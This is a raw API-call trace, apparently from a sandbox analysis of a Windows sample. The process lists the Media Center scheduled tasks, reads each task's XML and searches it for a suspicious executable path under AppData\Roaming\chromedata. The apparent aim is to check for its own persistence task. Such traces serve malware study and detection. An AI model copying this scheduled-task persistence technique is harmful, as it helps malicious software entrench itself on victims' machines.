	[0073.193] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRecoveryTasks $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.195] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRecoveryTasks $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.195] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.195] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x4, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.195] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="ehDRMInit") returned 0x0
	[0073.195] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ehDRMInit</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DRMInit</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.197] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ehDRMInit</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DRMInit</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.197] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.198] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x5, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.198] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="InstallPlayReady") returned 0x0
	[0073.198] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\InstallPlayReady</URI>\r\n    <Date>2008-02-08T15:02:27.7076832</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/InstallPlayReady $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.199] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\InstallPlayReady</URI>\r\n    <Date>2008-02-08T15:02:27.7076832</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/InstallPlayReady $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.200] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.200] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x6, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.200] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="mcupdate") returned 0x0
	[0073.200] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\mcupdate</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-125)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-126)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.202] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\mcupdate</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-125)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-126)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.202] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.202] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x7, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.202] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="MediaCenterRecoveryTask") returned 0x0
	[0073.202] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-137)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-138)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-MediaCenterRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{23E5D772-327A-42f5-BDEE-C65C6796BB2A}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.204] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-137)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-138)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-MediaCenterRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{23E5D772-327A-42f5-BDEE-C65C6796BB2A}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.204] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.204] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x8, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.205] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="ObjectStoreRecoveryTask") returned 0x0
	[0073.205] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-131)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-132)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-ObjectStoreRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{177AFECE-9599-46cf-90D7-68EC9EEB27B4}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.206] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-131)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-132)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-ObjectStoreRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{177AFECE-9599-46cf-90D7-68EC9EEB27B4}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.207] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.207] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x9, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.207] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="OCURActivate") returned 0x0
	[0073.207] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURActivate</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURActivate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.209] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURActivate</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURActivate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.209] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.209] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0xa, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.209] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="OCURDiscovery") returned 0x0
